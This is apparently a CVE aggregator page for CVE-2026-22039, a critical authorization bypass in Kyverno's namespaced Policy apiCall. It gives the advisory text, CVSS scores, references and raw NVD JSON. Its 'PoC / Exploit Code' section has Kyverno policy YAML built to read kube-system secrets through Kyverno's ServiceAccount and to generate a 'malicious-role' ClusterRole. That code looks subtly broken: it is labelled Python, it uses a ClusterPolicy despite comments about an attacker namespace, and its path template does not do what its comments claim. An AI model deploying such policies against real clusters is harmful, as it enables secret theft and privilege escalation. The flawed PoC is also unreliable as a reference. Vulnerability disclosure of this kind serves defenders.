CVE-2026-22039

Description

Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have a critical authorization boundary bypass in namespaced Kyverno Policy apiCall. The resolved `urlPath` is executed using the Kyverno admission controller ServiceAccount, with no enforcement that the request is limited to the policy’s namespace. As a result, any authenticated user with permission to create a namespaced Policy can cause Kyverno to perform Kubernetes API requests using Kyverno’s admission controller identity, targeting any API path allowed by that ServiceAccount’s RBAC. This breaks namespace isolation by enabling cross-namespace reads (for example, ConfigMaps and, where permitted, Secrets) and allows cluster-scoped or cross-namespace writes (for example, creating ClusterPolicies) by controlling the urlPath through context variable substitution. Versions 1.16.3 and 1.15.3 contain a patch for the vulnerability.

CVSS Details

CVSS Score

9.9

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:*:*:* - VULNERABLE

Kyverno < 1.15.3

Kyverno < 1.16.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-22039 PoC - Kyverno Authorization Boundary Bypass
# Target: Kyverno < 1.15.3 or < 1.16.3
# This PoC demonstrates how an authenticated user with namespace-level Policy create permission
# can exploit the apiCall feature to read secrets from other namespaces

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: exploit-api-call-boundary
spec:
  # This will be created in attacker-controlled namespace
  # But can access resources outside the namespace
  rules:
    - name: read-secrets-from-other-namespace
      match:
        any:
          - resources:
              kinds:
                - ConfigMap
      context:
        # Exploit: Use variable substitution to control urlPath
        - apiCall:
            urlPath: "/api/v1/namespaces/kube-system/secrets"
            # This path is outside the policy's namespace
            # but will be executed with Kyverno SA privileges
      mutate:
        patchStrategicMerge:
          data:
            exploited: "true"

---
# Alternative exploitation via namespaced Policy
apiVersion: kyverno.io/v1
kind: Policy
metadata:
  name: cross-namespace-read
  namespace: attacker-namespace
spec:
  rules:
    - name: read-configmaps-cross-ns
      match:
        resources:
          kinds:
            - Pod
      context:
        - apiCall:
            # Exploit: Access secrets from other namespace
            urlPath: "/api/v1/namespaces/{{request.namespace}}/secrets"
            # Can be manipulated to target any namespace
      generate:
        # Attempt to create cluster-scoped resources
        kind: ClusterRole
        apiVersion: rbac.authorization.k8s.io/v1
        name: malicious-role
        namespace: "{{request.namespace}}"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22039
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22039
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22039/
[4] VulDB https://vuldb.com/cve/CVE-2026-22039
[5] https://github.com/kyverno/kyverno/commit/e0ba4de4f1e0ca325066d5095db51aec45b1407b
[6] https://github.com/kyverno/kyverno/commit/eba60fa856c781bcb9c3be066061a3df03ae4e3e
[7] https://github.com/kyverno/kyverno/security/advisories/GHSA-8p9x-46gm-qfx2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22039", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:12.097", "lastModified": "2026-02-02T15:13:57.440", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have a critical authorization boundary bypass in namespaced Kyverno Policy apiCall. The resolved `urlPath` is executed using the Kyverno admission controller ServiceAccount, with no enforcement that the request is limited to the policy’s namespace. As a result, any authenticated user with permission to create a namespaced Policy can cause Kyverno to perform Kubernetes API requests using Kyverno’s admission controller identity, targeting any API path allowed by that ServiceAccount’s RBAC. This breaks namespace isolation by enabling cross-namespace reads (for example, ConfigMaps and, where permitted, Secrets) and allows cluster-scoped or cross-namespace writes (for example, creating ClusterPolicies) by controlling the urlPath through context variable substitution. Versions 1.16.3 and 1.15.3 contain a patch for the vulnerability."}, {"lang": "es", "value": "Kyverno es un motor de políticas diseñado para equipos de ingeniería de plataformas nativas de la nube. Las versiones anteriores a la 1.16.3 y 1.15.3 tienen un bypass crítico de límite de autorización en la llamada a la API de política de Kyverno con espacio de nombres. La 'urlPath' resuelta se ejecuta utilizando la ServiceAccount del controlador de admisión de Kyverno, sin que se aplique que la solicitud esté limitada al espacio de nombres de la política. Como resultado, cualquier usuario autenticado con permiso para crear una política con espacio de nombres puede hacer que Kyverno realice solicitudes a la API de Kubernetes utilizando la identidad del controlador de admisión de Kyverno, apuntando a cualquier ruta de API permitida por el RBAC de esa ServiceAccount. Esto rompe el aislamiento de espacios de nombres al permitir lecturas entre espacios de nombres (por ejemplo, ConfigMaps y, donde esté permitido, Secrets) y permite escrituras a nivel de clúster o entre espacios de nombres (por ejemplo, la creación de ClusterPolicies) controlando la 'urlPath' mediante la sustitución de variables de contexto. Las versiones 1.16.3 y 1.15.3 contienen un parche para la vulnerabilidad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}, {"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.15.3", "matchCriteriaId": "EC83E83A-2BA5-4A52-AF06-06E67CA03749"}, {"vulnerable": true, "criteria": "cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.16.0", "versionEndExcluding": "1.16.3", "matchCriteriaId": "AFFC15A4-197B-44FB-985A-BDDE22679655"}]}]}], "references": [{"url": "https://github.com/kyverno/kyverno/commit/e0ba4de4f1e0ca325066d5095db51aec45b1407b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kyverno/kyverno/commit/eba60fa856c781bcb9c3be066061a3df03ae4e3e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kyverno/kyverno/security/advisories/GHSA-8p9x-46gm-qfx2", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}